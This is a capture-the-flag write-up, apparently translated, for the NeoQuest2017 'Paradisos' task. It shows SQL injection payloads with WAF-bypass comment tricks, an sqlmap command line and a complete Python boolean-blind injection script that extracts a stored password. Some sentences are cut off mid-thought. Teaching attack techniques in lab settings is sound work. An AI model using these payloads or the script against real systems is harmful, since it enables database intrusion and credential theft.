[NeoQuest2017] “In Search of Earthlings” and not only ...
A couple of days ago, the next qualifying online-stage of the annual competition on cyber security, NeoQuest2017, ended . I express special thanks to the organizers: every year the story is more and more interesting, and the tasks are more difficult!
And this article will be devoted to the analysis of the ninth task: PARADISOS
"SEARCHING FOR EARTH"
Having reached the ship of the expedition in distress, we did not find anyone there - apparently, the guys managed to get out. But where to look for them now? Theoretically, they could get to the planet Paradisos, the last of which we have not yet visited.
This planet is a heavenly place: a wonderful climate, friendly inhabitants who joyfully greeted us with flowers and strange fruits, funny music and a bunch of happy aliens of all familiar and unfamiliar races. Mini-hotels soaring in the air, billboards in various languages (including earthly English). We were solemnly escorted to a beautiful hotel, promising full assistance in finding members of the expedition and in sharing knowledge about our planets. We managed to find out that the guys really were here and even created their own website, on which each of them made records about space travel.
')
The site address has been preserved, but we only saw the names of four researchers there. It turned out that clever aliens are demanding money for access to complete information. Of course, we will not pay. Let's try to "hack"!
Attached to the task is the address of the site that looks like this:
First of all, we will figure out where the text for the biography of each of the “researchers” comes from:
$("#DanielButton").click(function(){ $.ajax({url: "/bio/bio.php?name=Daniel", success: function(result){ $("#ScientistBio").html(result); $("#Avatar").show(); $("#Avatar").attr("src", "img/lava.png"); }}); }); Follow the link: " ./bio/bio.php?name=Daniel " and see the text of the biography. Is logical The first thought that visited me on this page (and I hope you,%% username, too) - try SQL Injection in the name parameter.
We try:
name=Daniel'+or+1=1+--+1 And to us in response:
Forbidden You don't have permission to access /bio/bio.php on this server. So the site is protected by WAF. Well, this is more interesting: it means there is something to protect!
It was established experimentally: “information_scheme”, “database ()”, “SELECT *”, “UNION” are prohibited for use. Go ahead ...
We try:
name=Dan'+'i'+'el And the text of his biography comes back to us. So the space works in the form of concatenation. Let's try another way:
name=Daniel'+or/**_**/1=1+--+1 Bingo! In response, we got a biography of all six researchers (and not 4, as on the main page): Roy, Ohad, Naomi, Daniel, Baldric and Sigizmund. The biography of the latter reads: “Like ctf and space!”. However, nowhere is the key. So you need
I decided to uncover heavy artillery: sqlmap ¯ \ _ (ツ) _ / ¯
After the first N attempts to
Having correctly configured the WAF bypass techniques (I had to use IT , but I decided to write my own
sqlmap -u "http://IP_ADDRESS/bio/bio.php?name=*" --level=5 --risk=3 --tamper="space2morecomment" --prefix="-1%27%20" --suffix="%20--%201" PWNED:
Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: http://IP_ADDRESS:80/bio/bio.php?name=-1' OR 228=228 -- 1 Vector: OR [INFERENCE] However, it was too early to rejoice: sqlmap persistently used forbidden "words" and the maximum that could be done was to use sql-shell:
In any case, my guesses were confirmed - BBbSQLi. Remembering a couple of lessons "crazy hands" was created this:
Achtung! Causes keyboard cancer
#!/usr/bin/python3 import requests from multiprocessing.dummy import Pool as ThreadPool import sys import subprocess import time pool = ThreadPool(101) pos = 1 passwd = '' def getSockCount(): proc = subprocess.Popen(['bash', '-c', 'ss | grep IP_ADDRESS | wc -l'], stdin=subprocess.PIPE, stdout=subprocess.PIPE) output = proc.communicate()[0] return int(output.decode()) # Send SQL Request def connect(sql): url = "http://IP_ADDRESS/bio/bio.php?name=-1' or/** **/(case/** **/when/** **/%s/** **/then/** **/1/** **/else/** **/0/** **/end)=1 -- 1" req = requests.get(url % sql.replace(' ', '/** **/')) if 'Hello! My name is' in req.text: return True return False def findColumns(item): if item.isdigit(): return sql = "%s>'0'" % item if connect(sql): print('Column: %s' % item) def getFieldValue(item): global passwd sql = "id=6 and substring(password,%d,1)='%s'" % (pos, item) if connect(sql): passwd += item alph = [chr(x) for x in range(ord('a'), ord('z') + 1)] + [chr(x) for x in range(ord('0'), ord('9') + 1)] + ['`', '~', '!', '@', '#', '$', '^', '&', '*', '(', ')', '_', '-', '+', '=', '[', ']', '{', '}', ';', ':', '\\', '|', '?', '/'] # Brute Columns if len(sys.argv) > 0: tables = open(sys.argv[1]).read().splitlines() chunk_size = max([len(x) for x in tables]) while True: pool.map(findColumns, tables) while getSockCount() > 2: time.sleep(1) # else: while True: pool.map(getFieldValue, alph) while getSockCount() > 2: time.sleep(1) pos += 1 print(passwd) Using this script, the following fields were obtained: "id" and "password". It was decided to start “brute” with the user “id = 6” (aka “Sigizmund”). In the end, it looked something like this:
In the end, humans won! Flag: 14eb6641da38addf613424f5cd05357ce261c305
Source: https://habr.com/ru/post/323778/
All Articles